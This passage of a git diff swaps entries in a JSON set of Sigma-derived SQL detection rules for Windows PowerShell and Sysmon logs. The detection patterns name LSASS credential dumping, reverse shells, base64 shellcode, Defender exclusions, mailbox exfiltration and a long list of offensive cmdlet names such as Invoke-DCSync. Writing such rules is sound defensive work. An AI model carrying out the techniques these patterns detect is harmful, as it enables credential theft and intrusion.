ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_susp_recon_export.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "title": "Powershell XML Execute Command", + "id": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.Xml.XmlDocument%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Load%' ESCAPE '\\' AND (ScriptBlockText LIKE '%IEX %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Expression %' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Command %' ESCAPE '\\' OR ScriptBlockText LIKE '%ICM -%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass.yml" + "filename": "posh_ps_xml_iex.yml" }, { - "title": "Potential NT API Stub Patching", - "id": "b916cba1-b38a-42da-9223-17114d846fd6", - "status": "experimental", - "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "title": "Automated Collection Command PowerShell", + "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" ], - "filename": "proc_access_win_invoke_patchingapi.yml" + "filename": "posh_ps_automated_collection.yml" }, { - "title": "Credential Dumping by LaZagne", - "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", - "status": "stable", - "description": "Detects LSASS process access by LaZagne for credential dumping.", - "author": "Bhabesh Raj, Jonhnathan Ribeiro", + "title": "Suspicious PowerShell Mailbox Export to Share - PS", + "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", + "status": "experimental", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0349" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" + "filename": "posh_ps_mailboxexport_share.yml" }, { - "title": "Windows Defender Exclusions Added - PowerShell", - "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "status": "experimental", - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "author": "Tim Rauch", + "title": "Testing Usage of Uncommonly Used Port", + "id": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "status": "test", + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1571" ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Test-NetConnection%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\' AND ScriptBlockText LIKE '%-port %' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '% 443 %' ESCAPE '\\' OR ScriptBlockText LIKE '% 80 %' ESCAPE '\\')))" ], - "filename": "posh_ps_win_defender_exclusions_added.yml" + "filename": "posh_ps_test_netconnection.yml" }, { - "title": "Extracting Information with PowerShell", - "id": "bd5971a7-626d-46ab-8176-ed643f694f68", - "status": "test", - "description": "Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\nThese can be files created by users to store their own credentials, shared credential stores for a group of individuals,\nconfiguration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\n", + "title": "Powershell Sensitive File Discovery", + "id": "7d416556-6502-45b2-9bad-9d2f05f38997", + "status": "experimental", + "description": "Detect adversaries enumerate sensitive files", "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1552.001" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%ls%' ESCAPE '\\' AND ScriptBlockText LIKE '% -R%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-string %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Pattern %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_extracting.yml" + "filename": "posh_ps_sensitive_file_discovery.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - Powershell", - "id": "779c8c12-0eb1-11eb-adc1-0242ac120002", + "title": "Invoke-Obfuscation Via Stdin - Powershell", + "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", "attack.t1027", @@ -6161,39 +5692,38 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$?\\{?input\\}?|noexit).+\"')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" ], - "filename": "posh_ps_invoke_obfuscation_stdin.yml" + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" }, { - "title": "PowerShell Remote Session Creation", - "id": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", + "title": "Detected Windows Software Discovery - PowerShell", + "id": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", "status": "experimental", - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "author": "frack113", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1518" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate administration activities" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSSession%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-itemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\software\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%select-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%format-table%' ESCAPE '\\')" ], - "filename": "posh_ps_remote_session_creation.yml" + "filename": "posh_ps_software_discovery.yml" }, { - "title": "PowerShell ShellCode", - "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "status": "test", - "description": "Detects Base64 encoded Shellcode", - "author": "David Ledbetter (shellcode), Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell", + "id": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -6202,250 +5732,291 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", - "id": "afd3df04-948d-46f6-ae44-25966c44b97f", - "status": "experimental", - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PowerShell Commandlets - ScriptBlock", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "test", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", "tags": [ "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PSAsyncShell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADR%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRExcel%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRHTML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRJSON%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-ADRXML%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADIDNS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR 